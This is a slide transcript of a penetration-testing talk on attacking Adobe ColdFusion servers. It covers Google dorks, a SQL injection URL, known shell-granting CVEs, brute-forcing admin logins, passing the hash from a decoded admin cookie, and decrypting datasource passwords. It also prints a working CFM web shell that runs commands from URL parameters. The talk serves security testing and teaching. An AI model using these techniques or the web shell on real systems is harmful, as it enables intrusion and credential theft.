SlideShare a Scribd company logo
ColdFusion for Pentesters
    Chris Gates
    Carnal0wnage
    Lares Consulting
Whoami
• Chris Gates (CG)
   –   Twitter carnal0wnage
   –   Blog carnal0wnage.attackresearch.com
   –   Job Partner/Principal Security Consultant at Lares
   –   Affiliations  Co-Founder NoVAHackers, wXf, Attack Research, Metasploit
       Project
• Previous Talks
   –   From LOW to PWNED
   –   Attacking Oracle (via web)
   –   wXf Web eXploitation Framework
   –   Open Source Information Gathering
   –   Attacking Oracle (via TNS)
   –   Client-Side Attacks
Agenda

•   What is ColdFusion
•   Who uses ColdFusion
•   Finding sites running ColdFusion
•   Attacking ColdFusion
    –   Common vulnerabilities
    –   Insta-Shell
    –   Gotta work for it
    –   Other Stuff

• Post Exploitation
• Defense?
Why This Talk?

• Kept running into ColdFusion on pentests
• Last “pentester” talk on ColdFusion was 2006 at EUSec
   – http://eusecwest.com/esw06/esw06-davis.pdf
• Chris Eng’s “Deconstructing ColdFusion” renewed my
  interest
   – https://media.blackhat.com/bh-us-
     10/whitepapers/Eng_Creighton/BlackHat-USA-2010-Eng-
     Creighton-Deconstructing-ColdFusion-wp.pdf
   – https://media.blackhat.com/bh-us-
     10/presentations/Eng_Creighton/BlackHat-USA-2010-Eng-
     Creighton-Deconstructing-ColdFusion-slides.pdf
• People in the ColdFusion world take a high level view of
  security and didn’t want to give up the details on f**king
  ColdFusion up…had to figure it out myself
What Is ColdFusion?

• CFML = ColdFusion Markup Language

• ColdFusion = Adobe’s product that handles CFML page/libs
   – Runs on Windows, Solaris, HP/UX and Linux
   – Apache, IIS, Jrun


• Not the only product that can handle CFML

• Railo, Mura CMS, Open Blue Dragon support CFML
Who Uses ColdFusion?




http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/cf-evangelist-kit.pdf
Who Uses ColdFusion?




http://wwwimages.adobe.com/www.adobe.com/content/dam/Adobe/en/products/coldfusion/pdfs/cf-evangelist-kit.pdf
Who Uses ColdFusion?




http://www.bricecheddarn.com/blog/post.cfm/universities-love-using-coldfusion
Who Uses ColdFusion [MURA CMS]?




http://www.getmura.com/index.cfm/overview/who-uses-mura/
Finding Sites Running ColdFusion
• inurl:/index.cfm
Finding Sites Running ColdFusion
• Who doesn’t love Google Dorks…

• filetype:cfm "cfapplication name" password
• inurl:login.cfm
• intitle:"Error Occurred" "The error occurred in"
  filetype:cfm
• intitle:"ColdFusion Administrator Login“
• intitle:"Index of" cfide
Finding Sites Running ColdFusion
• inurl:/CFIDE/componentutils/
Finding Sites Running ColdFusion
• inurl:/CFIDE/componentutils/ (Find misconfigured servers)
Finding Sites Running ColdFusion
• http://www.gotcfm.com/thelist.cfm
Finding Sites Running ColdFusion
• Delicious 
ColdFusion Hit list
• ColdFusion 5
ColdFusion Hit list
• ColdFusion 6
ColdFusion Hit list
• ColdFusion 7
ColdFusion Hit list
• ColdFusion 8
ColdFusion Hit list
• ColdFusion 9
ColdFusion Hit list
• ColdFusion 10
ColdFusion Scanner
• Metasploit Module to find ColdFusion URLs
ColdFusion Scanner
• Metasploit Module to find ColdFusion URLs
Attacking ColdFusion

•   http://www.cvedetails.com/version-list/53/8739/1/Adobe-Coldfusion.html
Attacking ColdFusion

• Common Vulnerabilities
  –   Information Disclosure
  –   XSS
  –   SQL Injection
  –   Admin Interfaces Exposed (more later)
Attacking ColdFusion

• Information Disclosure
• Need to determine standard vs Enterprise
  ColdFusion? *
• Just request a .jsp page
   – Standard versions don’t do JSP and will tell
     you so via 500 error && license exception
   – Enterprise supports jsp and will just 404




• *useful for post exploitation
Attacking ColdFusion

• Enterprise
Attacking ColdFusion

• Standard
Attacking ColdFusion
• Information Disclosure
Attacking ColdFusion
Attacking ColdFusion
Attacking ColdFusion
Attacking ColdFusion
Attacking ColdFusion
• XSS
• Generally XSS is boring, but wait until we
  talk about cookies….
• ColdFusion has scriptProtect helps strip out
  <script> tags
• The blacklist used by scriptProtect:
&lt;s*(object|embed|script|applet|meta)
• Chris Eng’s Deconstruction CF whitepaper
  goes into detail.
Attacking ColdFusion
• XSS
Attacking ColdFusion
• XSS
Attacking ColdFusion
• SQL Injection
• If you see =somenumber go after it
<cfquery name="getContent"
dataSource="myDataSource">
select title from tblJobs where
visible = 1 and id= #url.id#
</cfquery>
• Like most applications, its possible to write
  secure code but some people don’t.
Attacking ColdFusion
• SQL Injection
• http://site.com/links/apply.cfm?id=(@@version)
Attacking ColdFusion

• Insta-Shell
• BlazeDS/AMF External XML Entity Injection (CVE-2009-3960)
• File Upload Vulnerability in CF8 FCKeditor (APSB09-09)
• ‘locale’ Path Traversal Vulnerability detected (CVE-2010-2861,
  APSB10-18)
Attacking ColdFusion
• Patching
  – ColdFusion requires manual patching, unzip in folder, overwrite a jar, etc
  – Admin interface doesn’t alert you to available patches
  – I’m not a CF admin, but seems easy to miss one
Attacking ColdFusion

• Pro Tip
• Determining version is helpful for insta-
  shell exploits
• Metasploit module can tell you by admin
  interface, or you can just look at
  CFIDE/administator/
Attacking ColdFusion

• Or you can check the wsdl 
• /CFIDE/adminapi/base.cfc?wsdl
  – Checked on 7-9
Attacking ColdFusion
Attacking ColdFusion
Attacking ColdFusion
• BlazeDS/AMF External XML Entity Injection
     – Advisory pdf: http://www.security-assessment.com/files/advisories/2010-02-
       22_Multiple_Adobe_Products-XML_External_Entity_and_XML_Injection.pdf

• Affects:
     –   BlazeDS 3.2 and earlier versions
     –   LiveCycle 9.0, 8.2.1, and 8.0.1
     –   LiveCycle Data Services 3.0, 2.6.1, and 2.5.1
     –   Flex Data Services 2.0.1
     –   ColdFusion 9.0, 8.0.1, 8.0, and 7.0.2
• CVE-2009-3960 / APSB10-05
•   http://www.metasploit.com/modules/auxiliary/scanner/http/adobe_xml_inject
Attacking ColdFusion
• BlazeDS/AMF External XML Entity Injection




•   http://www.security-assessment.com/files/advisories/2010-02-22_Multiple_Adobe_Products-
    XML_External_Entity_and_XML_Injection.pdf
Attacking ColdFusion
• BlazeDS/AMF External XML Entity Injection
Attacking ColdFusion
• FCKeditor (apsb09-09)
• ColdFusion 8.01 enabled the ColdFusion FCKeditor
  connector && FCKeditor vulns == unauth fileupload
/CFIDE/scripts/ajax/FCKeditor/editor/file
manager/connectors/cfm/upload.cfm
• http://metasploit.com/modules/exploit/windows/http/col
  dfusion_fckeditor
Attacking ColdFusion
• (related) FCKeditor (CVE 2009-2265) input sanitization
  issues
• FCKeditor prior to 2.6.4.1
• Can also check version with a GET request
• /CFIDE/scripts/ajax/FCKeditor/editor/dialog/fck_about.html
Attacking ColdFusion
• “Locale” Directory Traversal




• Full walkthru here:
• http://www.gnucitizen.org/blog/coldfusion-directory-
  traversal-faq-cve-2010-2861/
Attacking ColdFusion
• http://www.gnucitizen.org/blog/coldfusion-directory-
  traversal-faq-cve-2010-2861/
• TL;DR
   – You can pass the hash




• Modules for Metasploit and Canvas to exploit and get shell.
Attacking ColdFusion
• “Locale” Directory Traversal
• Vulnerable Versions:
• ColdFusion MX6 6.1 base patches
  ColdFusion MX7 7,0,0,91690 base patches
  ColdFusion MX8 8,0,1,195765 base patches
  ColdFusion MX8 8,0,1,195765 with Hotfix4
• ColdFusion 9? Immunity reported yes, but Adobe fixed downloadable
  version of 9. so maaaaaaybe if old version of 9.
Attacking ColdFusion
• “Locale” Directory Traversal




• ColdFusion 7 is always vuln, no patch
Attacking ColdFusion
• Yeah, CF 8 too (has patch)
Attacking ColdFusion
• Problem with traversal exploit, is you need to
  know full path.
• Manageable on Windows…
• Can be anywhere on *nix
   – Cue path disclosure vulns 
   – Directory listings
   – Misconfigured componentutils access
Attacking ColdFusion
• Componentutils (Component cfcexplorer)
• Documentation for functions, includes full paths 
Attacking ColdFusion

• Gotta work for it…
• Brute Force RDS Access (If Enabled)
    – Check if RDS is enabled 
    – Brute force RDS
• Brute Force Admin Interfaces
    – Main login page uses a salt that changes every 60 sec
    – Use another login page  also accepts admin password
        • Set’s cookie when you guess the right password


•   No account lockouts
•   Depending on version no username required
•   No password complexity requirements
•   No real logging (web server logging)
Attacking ColdFusion

• RDS = Remote Development Services
• “In ColdFusion Studio/Builder/Eclipse, you
  can connect to and work with the files on
  any server that has ColdFusion Server
  installed by using RDS, just as if you were
  working with files on your own computer.”
• FTP over HTTP (essentially)
• Lots of docs, go read…
Attacking ColdFusion

• RDS
Attacking ColdFusion

• RDS
Attacking ColdFusion

• RDS
Attacking ColdFusion

• Admin Interfaces
• Prior to CF8 only password auth, CF 8
  introduces usernames
• Easy to tell if just “admin” or other
  usernames
Attacking ColdFusion
Attacking ColdFusion
Attacking ColdFusion

• Admin Interfaces
• /CFIDE/administrator/index.cfm salts
  the password
Attacking ColdFusion
• Lots of other pages don’t 
• Ex. /CFIDE/componentutils/login.cfm
Attacking ColdFusion
• Get the password right, CF sets a cookie
Attacking ColdFusion
• Metasploit Module




• Can do this easily in Burp Suite as well
Your passwords suck
Attacking ColdFusion

• Other Stuff
• Solr
• Interacting with CFC’s
• Cookies
Attacking ColdFusion

• Solr APSB10-04 (Information Disclosure)
  – “Vulnerability in Solr could allow access to
    collections created by the Solr Service to be
    accessed from any external machine using a
    specific URL”
• http://IP:8983/solr/data_medialibrary/adm
  in/get-properties.jsp
• http://IP:8983/solr/core0/admin/get-
  properties.jsp
Attacking ColdFusion

• Solr APSB10-04 (Information Disclosure)
Attacking ColdFusion

• Interacting with CFC’s
http://example.com/foo.cfc?method=mymethod&a
rga=val1&argb=val2
• This URL will invoke method mymethod on an
  anonymous instance of component foo.cfc, with
  arguments arga=“val1” and argb=“val2”

ex: /CFIDE/adminapi/administrator.cfc?method=getSalt

• Can only invoke “remote” ones over web browser
• Default stuff not sexy, custom stuff might have fun stuff.
Attacking ColdFusion

• Cookies
• Normally that XSS pop up with the
  session cookie is pretty lame.
• “Supposed” to have a limited lifespan.
• BUT cfadmin cookie and cfutils cookie
  are different.
• Let’s see…
Attacking ColdFusion
• Example Admin Cookie:
CFAUTHORIZATION_cfadmin=YWRtaW4NRTM4QUQyMTQ5NDNEQUFEMUQ
2NEMxMDJGQUVDMjlERTRBRkU5REEzRA1jZmFkbWlu
• Base64Decodes to:
  – admin
  – E38AD214943DAAD1D64C102FAEC29DE4AFE9DA3D
  – cfadmin

• e38ad214943daad1d64c102faec29de4afe9d
  a3d(sha1)=password1 WTF!!!
Attacking ColdFusion

•   To Recap…
•   Got the cfadmin cookie
•   No randomness at all in the cookie
•   SSL not enabled by default on admin interface
•   Cookie base64 decodes to the sha1 hash of the user,
•   Shown we don’t actually need to crack the hash, can just pass it

• Bad?
Attacking ColdFusion

• CFAUTHORIZATION_componentutils=cGFzc3dvcmQxDXBhc3N3b3JkMQ1
  jb21wb25lbnR1dGlscw==

• Base64Decodes to:
   – password1
   – password1
   – componentutils


• OMGWTFBBQ!!!
Attacking ColdFusion
• But real world?
Attacking ColdFusion
• But real world?
Attacking ColdFusion
• From 2009 to 2012…
Post Exploitation

•   ColdFusion Privilege Level
•   Scheduling tasks
•   Executing code
•   Decrypting database credentials
•   CFM Shells
Post Exploitation

• ColdFusion (by default) runs as SYSTEM on
  Windows and NOBODY ON *nix
• Obviously, CF on Windows is what you want
• Sites that run other languages that haven't
  unmapped the ColdFusion variables are
  awesome too 
Post Exploitation
• Scheduling Tasks
• Once you have access to admin interface you can
  schedule a task to download code/executables/
  bat files/etc
Post Exploitation
Post Exploitation
• Executing code
• Once you have code/exe on box you can create a
  system probe (that we want to fail) to make the
  code execute
• Or if you put cfm/jsp shell on the box, you’re
  done 
Post Exploitation
Post Exploitation
Post Exploitation
Post Exploitation

• Decrypting database credentials
• http://hexale.blogspot.com/2008/07/how-
  to-decrypt-coldfusion-datasource.html
Post Exploitation
• Go to DataSource Selection
Post Exploitation
• Click on DataSource (ex TEST)
Post Exploitation
• View Source, get value
Post Exploitation

• Decrypt it

$ python coldfusiondecrypt.py
maJsuHYMay8zpmptC2yibA==
Coldfusion v7 y v8 DataSource password decryptor (c) 2008
Hernan Ochoa (hernan@gmail.com)



decrypted password: ThisIsAPassword
Post Exploitation
• If you have file system access, just grab the XML files

• Coldfusion 7: libneo-query.xml
for example: c:CFusionMX7libneo-query.xml

• Coldfusion 8: libneo-datasource.xml
for example: c:coldfusion8libneo-datasource.xml

• Coldfusion 9: libneo-datasource.xml
for example: c:coldfusion9libneo-datasource.xml
Post Exploitation
• CFM Shells
• ColdFusion has several handy CFML tags:
  –   CFEXECUTE
  –   CFREGISTRY
  –   CFFILE
  –   CFHTTP

Simple CFM Shell:
<html>
<body>
<cfexecute name = "#URL.runme#" arguments =
"#URL.args#" timeout = "20">
</cfexecute>
</body>
</html>
Post Exploitation
• CFM Shells
• Its common to disable CFEXECUTE*
• CF also runs java so:
<cfset runtime = createObject("java",
"java.lang.System")>
<cfset props = runtime.getProperties()>
<cfdump var="#props#">
<cfset env = runtime.getenv()>
<cfdump var="#env#">


• Will give you something like…
Post Exploitation
Post Exploitation
• CFM Shells
• Remember Enterprise vs Standard?
  – Enterprise runs jsp, so some jsp shells will work too
    (depends on the shell’s java version requirements)
Post Exploitation
• CFM Shells
• Sky’s the limit!
• Pretty much anything you can code in Java, CF will
  run for you
• ColdFusion 9 and above support cfscript ==
  javascript for ColdFusion
ColdFusion Stuff To Read

• http://www.petefreitag.com/ lots of defense/CF
  hardening info
• http://www.bennadel.com/blog/
• http://www.raymondcamden.com/ http://12robots.com/
• Chris Eng’s Deconstructing ColdFusion (slides and WP)
  •    https://media.blackhat.com/bh-us-10/presentations/Eng_Creighton/BlackHat-USA-2010-Eng-
       Creighton-Deconstructing-ColdFusion-slides.pdf

• Davis’ EUSEC ColdFusion talk
   –    http://eusecwest.com/esw06/esw06-davis.pdf
   –    Alt:
        http://www.orkspace.net/secdocs/Conferences/EuSecWest/2006/ColdFusion%20Security.pdf
Questions?




Chris Gates
@carnal0wnage
cgates [] laresconsulting[] com

More Related Content

What's hot

JWT: jku x5u
JWT: jku x5uJWT: jku x5u
JWT: jku x5u
snyff
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification needed
Frans Rosén
 
Jenkins를 활용한 Openshift CI/CD 구성
Jenkins를 활용한 Openshift CI/CD 구성 Jenkins를 활용한 Openshift CI/CD 구성
Jenkins를 활용한 Openshift CI/CD 구성
rockplace
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
DefconRussia
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
Дмитрий Бумов
 
왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요
왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요
왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요
Jo Hoon
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
Mikhail Egorov
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
Mikhail Egorov
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
Avinash Thapa
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
Rodolfo Assis (Brute)
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug Class
CODE WHITE GmbH
 
Connecting the Dots: Kong for GraphQL Endpoints
Connecting the Dots: Kong for GraphQL EndpointsConnecting the Dots: Kong for GraphQL Endpoints
Connecting the Dots: Kong for GraphQL Endpoints
Julien Bataillé
 
OAuth2 and Spring Security
OAuth2 and Spring SecurityOAuth2 and Spring Security
OAuth2 and Spring Security
Orest Ivasiv
 
Aem asset optimizations & best practices
Aem asset optimizations & best practicesAem asset optimizations & best practices
Aem asset optimizations & best practices
Kanika Gera
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
Nutan Kumar Panda
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
Christopher Frohoff
 
Selenium
SeleniumSelenium
Selenium
Kalyan ch
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
Soroush Dalili
 
iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersiOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for Beginners
RyanISI
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
Frans Rosén
 

What's hot (20)

JWT: jku x5u
JWT: jku x5uJWT: jku x5u
JWT: jku x5u
 
DNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification neededDNS hijacking using cloud providers – No verification needed
DNS hijacking using cloud providers – No verification needed
 
Jenkins를 활용한 Openshift CI/CD 구성
Jenkins를 활용한 Openshift CI/CD 구성 Jenkins를 활용한 Openshift CI/CD 구성
Jenkins를 활용한 Openshift CI/CD 구성
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Offzone | Another waf bypass
Offzone | Another waf bypassOffzone | Another waf bypass
Offzone | Another waf bypass
 
왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요
왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요
왜 쿠버네티스는 systemd로 cgroup을 관리하려고 할까요
 
Hunting for security bugs in AEM webapps
Hunting for security bugs in AEM webappsHunting for security bugs in AEM webapps
Hunting for security bugs in AEM webapps
 
Hacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sitesHacking Adobe Experience Manager sites
Hacking Adobe Experience Manager sites
 
Waf bypassing Techniques
Waf bypassing TechniquesWaf bypassing Techniques
Waf bypassing Techniques
 
Building Advanced XSS Vectors
Building Advanced XSS VectorsBuilding Advanced XSS Vectors
Building Advanced XSS Vectors
 
Java Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug ClassJava Deserialization Vulnerabilities - The Forgotten Bug Class
Java Deserialization Vulnerabilities - The Forgotten Bug Class
 
Connecting the Dots: Kong for GraphQL Endpoints
Connecting the Dots: Kong for GraphQL EndpointsConnecting the Dots: Kong for GraphQL Endpoints
Connecting the Dots: Kong for GraphQL Endpoints
 
OAuth2 and Spring Security
OAuth2 and Spring SecurityOAuth2 and Spring Security
OAuth2 and Spring Security
 
Aem asset optimizations & best practices
Aem asset optimizations & best practicesAem asset optimizations & best practices
Aem asset optimizations & best practices
 
Pentesting ReST API
Pentesting ReST APIPentesting ReST API
Pentesting ReST API
 
OWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling PicklesOWASP AppSecCali 2015 - Marshalling Pickles
OWASP AppSecCali 2015 - Marshalling Pickles
 
Selenium
SeleniumSelenium
Selenium
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
iOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for BeginnersiOS Application Penetration Testing for Beginners
iOS Application Penetration Testing for Beginners
 
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web TechnologiesOWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
OWASP AppSecEU 2018 – Attacking "Modern" Web Technologies
 

Similar to ColdFusion for Penetration Testers

Become a Security Rockstar with ColdFusion 2016
Become a Security Rockstar with ColdFusion 2016Become a Security Rockstar with ColdFusion 2016
Become a Security Rockstar with ColdFusion 2016
ColdFusionConference
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
Chris Gates
 
Securing Legacy CFML Code
Securing Legacy CFML CodeSecuring Legacy CFML Code
Securing Legacy CFML Code
ColdFusionConference
 
Securing applications
Securing applicationsSecuring applications
Securing applications
ColdFusionConference
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security Training
ColdFusionConference
 
Cold fusion Security-How to Secure Coldfusion Server
Cold fusion Security-How to Secure Coldfusion ServerCold fusion Security-How to Secure Coldfusion Server
Cold fusion Security-How to Secure Coldfusion Server
Mindfire Solutions
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
ClubHack
 
Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Hacking Tizen : The OS of Everything - Nullcon Goa 2015Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Ajin Abraham
 
Watch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty ResultsWatch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty Results
jtmelton
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
hernanibf
 
DEF CON 27 - workshop - RICHARD GOLD - mind the gap
DEF CON 27 - workshop - RICHARD GOLD - mind the gapDEF CON 27 - workshop - RICHARD GOLD - mind the gap
DEF CON 27 - workshop - RICHARD GOLD - mind the gap
Felipe Prado
 
Automating Security Response with Serverless
Automating Security Response with ServerlessAutomating Security Response with Serverless
Automating Security Response with Serverless
Michael Ducy
 
CFDJ_6-9_ALEX
CFDJ_6-9_ALEXCFDJ_6-9_ALEX
CFDJ_6-9_ALEX
Alex Hübner
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
Hackito Ergo Sum
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
Jeremy Brown
 
Derbycon Bromium Labs: Sandboxes
Derbycon Bromium Labs: SandboxesDerbycon Bromium Labs: Sandboxes
Derbycon Bromium Labs: Sandboxes
Bromium Labs
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?
Nathan Van Gheem
 
Intro To CommandBox CLI,Package Manager, Server at the Japan CFUG
Intro To CommandBox CLI,Package Manager, Server at the Japan CFUGIntro To CommandBox CLI,Package Manager, Server at the Japan CFUG
Intro To CommandBox CLI,Package Manager, Server at the Japan CFUG
Ortus Solutions, Corp
 
ColdFusion 11 New Features
ColdFusion 11 New FeaturesColdFusion 11 New Features
ColdFusion 11 New Features
Mindfire Solutions
 
MyFaces CODI and JBoss Seam3 become Apache DeltaSpike
MyFaces CODI and JBoss Seam3 become Apache DeltaSpikeMyFaces CODI and JBoss Seam3 become Apache DeltaSpike
MyFaces CODI and JBoss Seam3 become Apache DeltaSpike
os890
 

Similar to ColdFusion for Penetration Testers (20)

Become a Security Rockstar with ColdFusion 2016
Become a Security Rockstar with ColdFusion 2016Become a Security Rockstar with ColdFusion 2016
Become a Security Rockstar with ColdFusion 2016
 
Lares from LOW to PWNED
Lares from LOW to PWNEDLares from LOW to PWNED
Lares from LOW to PWNED
 
Securing Legacy CFML Code
Securing Legacy CFML CodeSecuring Legacy CFML Code
Securing Legacy CFML Code
 
Securing applications
Securing applicationsSecuring applications
Securing applications
 
Hack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security TrainingHack & Fix, Hands on ColdFusion Security Training
Hack & Fix, Hands on ColdFusion Security Training
 
Cold fusion Security-How to Secure Coldfusion Server
Cold fusion Security-How to Secure Coldfusion ServerCold fusion Security-How to Secure Coldfusion Server
Cold fusion Security-How to Secure Coldfusion Server
 
Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)Metasploitation part-1 (murtuja)
Metasploitation part-1 (murtuja)
 
Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Hacking Tizen : The OS of Everything - Nullcon Goa 2015Hacking Tizen : The OS of Everything - Nullcon Goa 2015
Hacking Tizen : The OS of Everything - Nullcon Goa 2015
 
Watch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty ResultsWatch How The Giants Fall: Learning from Bug Bounty Results
Watch How The Giants Fall: Learning from Bug Bounty Results
 
Fix me if you can - DrupalCon prague
Fix me if you can - DrupalCon pragueFix me if you can - DrupalCon prague
Fix me if you can - DrupalCon prague
 
DEF CON 27 - workshop - RICHARD GOLD - mind the gap
DEF CON 27 - workshop - RICHARD GOLD - mind the gapDEF CON 27 - workshop - RICHARD GOLD - mind the gap
DEF CON 27 - workshop - RICHARD GOLD - mind the gap
 
Automating Security Response with Serverless
Automating Security Response with ServerlessAutomating Security Response with Serverless
Automating Security Response with Serverless
 
CFDJ_6-9_ALEX
CFDJ_6-9_ALEXCFDJ_6-9_ALEX
CFDJ_6-9_ALEX
 
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
[HES2013] Virtually secure, analysis to remote root 0day on an industry leadi...
 
Cloud Device Insecurity
Cloud Device InsecurityCloud Device Insecurity
Cloud Device Insecurity
 
Derbycon Bromium Labs: Sandboxes
Derbycon Bromium Labs: SandboxesDerbycon Bromium Labs: Sandboxes
Derbycon Bromium Labs: Sandboxes
 
Do you lose sleep at night?
Do you lose sleep at night?Do you lose sleep at night?
Do you lose sleep at night?
 
Intro To CommandBox CLI,Package Manager, Server at the Japan CFUG
Intro To CommandBox CLI,Package Manager, Server at the Japan CFUGIntro To CommandBox CLI,Package Manager, Server at the Japan CFUG
Intro To CommandBox CLI,Package Manager, Server at the Japan CFUG
 
ColdFusion 11 New Features
ColdFusion 11 New FeaturesColdFusion 11 New Features
ColdFusion 11 New Features
 
MyFaces CODI and JBoss Seam3 become Apache DeltaSpike
MyFaces CODI and JBoss Seam3 become Apache DeltaSpikeMyFaces CODI and JBoss Seam3 become Apache DeltaSpike
MyFaces CODI and JBoss Seam3 become Apache DeltaSpike
 

More from Chris Gates

Reiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVReiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHV
Chris Gates
 
WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018
Chris Gates
 
WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library)
Chris Gates
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
Chris Gates
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Chris Gates
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)
Chris Gates
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
Chris Gates
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Chris Gates
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackers
Chris Gates
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Chris Gates
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
Chris Gates
 
Going Purple : From full time breaker to part time fixer: 1 year later
